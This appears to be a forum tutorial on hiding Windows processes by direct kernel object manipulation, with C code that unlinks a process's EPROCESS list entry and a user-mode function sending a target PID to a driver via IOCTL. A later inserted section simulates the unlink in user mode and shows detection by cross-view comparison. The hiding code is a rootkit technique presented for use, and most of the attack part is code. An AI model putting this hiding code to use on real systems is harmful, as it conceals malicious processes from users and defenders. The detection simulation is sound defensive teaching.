
[en_US] - DKOM to Windows process manager [EPROCESS by linked list corruption]

xhinz

Before talking about using DKOM to hide processes, you need some knowledge of
linked lists, because the hiding works by corrupting one.

What is the purpose of a linked list?
Programmers use linked lists to chain data items in a certain order. In a doubly-linked
list each item carries two pointers: *blink (backward link pointer) and *flink (forward link pointer).

About *blink and *flink
Their purposes are simple: the *blink pointer points to the item before the current one
in the list, and the *flink pointer points to the item after it.

So, how do you corrupt a linked list?
Since *blink points to the previous item and *flink points to the next one, the current item
can be cut out of the chain by changing two pointers: set the *flink of the previous item to
point at the next item, and set the *blink of the next item to point at the previous item.
Anyone walking the list still sees an intact chain, but the current item is no longer part of it.

What about EPROCESS?
EPROCESS is the kernel structure that represents each process in the Windows process manager; it is the struct that holds the *blink and *flink pointers linking the processes together into a list.

Below is the function that corrupts that list to hide the current entry, and the loader function that tells the driver which entry to treat as Current before the DKOM is applied.

pwn-eprocess.c
Code:
void magic(PLIST_ENTRY Current) {
    /* Current->Flink -> points to the next process
     * Current->Blink -> points to the prior process
     *
     * (Current->Blink)->Flink points to the process after the previous process
     * (Current->Flink)->Blink points to the process prior to the later process */

    (Current->Blink)->Flink = Current->Flink;
    (Current->Flink)->Blink = Current->Blink;

    // Point the unlinked entry at itself, so a later walk through it does not
    // touch a dangling neighbour and cause a BSOD (blue screen of death)
    Current->Blink = (PLIST_ENTRY)&Current->Flink;
    Current->Flink = (PLIST_ENTRY)&Current->Flink;

    return;
}

After this, the unlinked entry is no longer reachable from the process list, and the process with that PID no longer appears in the Windows process manager.
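To make the mechanics concrete from the detection side, here is an added user-mode C simulation; it is not part of xhinz's post or of any driver. It builds a circular doubly-linked list of fake process records with LIST_ENTRY-style Flink/Blink fields, unlinks one entry the same way `magic` does, and then shows why the usual defender's answer is a cross-view check: a walk of the corrupted list stays perfectly self-consistent (every Flink->Blink still points back), so the hidden entry only shows up when the list walk is compared against a second, independent view of the same objects (here a flat array, standing in for a handle/ID table that the unlink never modifies). The struct names, pids and the second view are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>

/* Minimal stand-in for the kernel's LIST_ENTRY: one node of a circular doubly-linked list.
 * Field names mirror the Windows structure, but this is a user-mode simulation, not kernel code. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;   /* forward link: next node */
    struct _LIST_ENTRY *Blink;   /* backward link: previous node */
} LIST_ENTRY, *PLIST_ENTRY;

/* Simplified stand-in for EPROCESS: a pid plus the embedded list link. */
typedef struct {
    unsigned long Pid;
    LIST_ENTRY ActiveProcessLinks;
} FAKE_PROCESS;

#define MAX_PROCS 8

/* Two independent views of the same objects: the linked list (what a list walk sees)
 * and a flat table of every object (standing in for an ID table the unlink never touches). */
static FAKE_PROCESS g_procs[MAX_PROCS];
static LIST_ENTRY g_head;

/* Recover the containing object from its embedded link (CONTAINING_RECORD idiom). */
static FAKE_PROCESS *from_link(PLIST_ENTRY e) {
    return (FAKE_PROCESS *)((char *)e - offsetof(FAKE_PROCESS, ActiveProcessLinks));
}

static void list_init(PLIST_ENTRY head) { head->Flink = head->Blink = head; }

static void list_insert_tail(PLIST_ENTRY head, PLIST_ENTRY e) {
    e->Flink = head;
    e->Blink = head->Blink;
    head->Blink->Flink = e;
    head->Blink = e;
}

/* Build the constructed sample: pids 4, 100, 200, ... 700, linked in that order. */
void build_sample(void) {
    list_init(&g_head);
    for (int i = 0; i < MAX_PROCS; i++) {
        g_procs[i].Pid = (i == 0) ? 4 : 100UL * i;
        list_insert_tail(&g_head, &g_procs[i].ActiveProcessLinks);
    }
}

/* The unlink the post describes, reproduced so the detection below has something to find:
 * the neighbours are re-pointed around the node, then the node is pointed at itself. */
void unlink_entry(PLIST_ENTRY Current) {
    Current->Blink->Flink = Current->Flink;
    Current->Flink->Blink = Current->Blink;
    Current->Flink = Current;
    Current->Blink = Current;
}

/* View 1: walk the list from the head. Returns how many pids were written to out. */
int list_view(unsigned long *out, int max) {
    int n = 0;
    for (PLIST_ENTRY e = g_head.Flink; e != &g_head && n < max; e = e->Flink)
        out[n++] = from_link(e)->Pid;
    return n;
}

/* Structural check: every node's forward neighbour must point back to it.
 * A careful unlink leaves this intact, which is why the check is not enough on its own. */
int list_is_consistent(void) {
    for (PLIST_ENTRY e = &g_head;; e = e->Flink) {
        if (e->Flink->Blink != e) return 0;
        if (e->Flink == &g_head) return 1;
    }
}

/* Cross-view check: any pid present in the table but absent from the list walk is hidden.
 * Returns the number of hidden pids written to `hidden`. */
int find_hidden(unsigned long *hidden, int max) {
    unsigned long seen[MAX_PROCS];
    int nseen = list_view(seen, MAX_PROCS), nhidden = 0;
    for (int i = 0; i < MAX_PROCS && nhidden < max; i++) {
        int found = 0;
        for (int j = 0; j < nseen; j++)
            if (seen[j] == g_procs[i].Pid) { found = 1; break; }
        if (!found) hidden[nhidden++] = g_procs[i].Pid;
    }
    return nhidden;
}

int main(void) {
    unsigned long hidden[MAX_PROCS];
    build_sample();
    printf("before unlink: consistent=%d hidden=%d\n",
           list_is_consistent(), find_hidden(hidden, MAX_PROCS));
    unlink_entry(&g_procs[3].ActiveProcessLinks);   /* hide the record with pid 300 */
    int n = find_hidden(hidden, MAX_PROCS);
    printf("after unlink:  consistent=%d hidden=%d", list_is_consistent(), n);
    for (int i = 0; i < n; i++) printf(" pid=%lu", hidden[i]);
    printf("\n");
    return 0;
}
```

The point to take away is the second run: after the unlink the list still passes its own consistency check, so only the comparison against an independent enumeration reveals pid 300. Memory-forensics tooling applies the same idea on a real system by comparing a list walk with a separate scan for process objects.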

Setting a PID as the Current entry of the EPROCESS list

Code:
#include <windows.h>
#include <string.h>

/* Sends the PID (as a decimal string) to the driver with IOCTL 0x815.
 * Returns 0 on success and 1 if DeviceIoControl failed. */
int config_eProcess(char *pid, HANDLE hDevice){
    DWORD retbyt = 0;      // bytes returned by the driver
    char retbuf[200];      // output buffer must be real memory, not an uninitialised pointer

    BOOL call_return = DeviceIoControl(
        hDevice,
        0x815,
        pid,
        (DWORD)strlen(pid) + 1,
        retbuf,
        sizeof(retbuf),
        &retbyt,
        (LPOVERLAPPED) NULL);

    if(!call_return)
        return 1;
    return 0;
}

Before passing the PID parameter to config_eProcess, convert the numeric pid to a string with the %ld format (numeric_pid must be a long, and newpidformat must be large enough to hold it), for example:

sprintf(newpidformat, "%ld", numeric_pid);
 